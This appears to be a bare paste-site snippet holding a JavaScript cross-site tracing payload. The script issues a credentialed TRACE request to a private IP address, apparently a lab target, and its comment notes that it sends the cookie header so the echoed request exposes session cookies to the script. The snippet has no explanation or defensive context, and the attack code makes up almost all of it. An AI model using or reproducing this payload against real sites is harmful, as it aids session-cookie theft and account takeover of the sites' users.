Untitled

 avatar
unknown
plain_text
4 years ago
205 B
4
Indexable
<script>
  var xmlhttp = new XMLHttpRequest();
  var url = 'http://10.129.99.148/';

  xmlhttp.withCredentials = true; // send cookie header
  xmlhttp.open('TRACE', url, false);
  xmlhttp.send();
</script>
Editor is loading...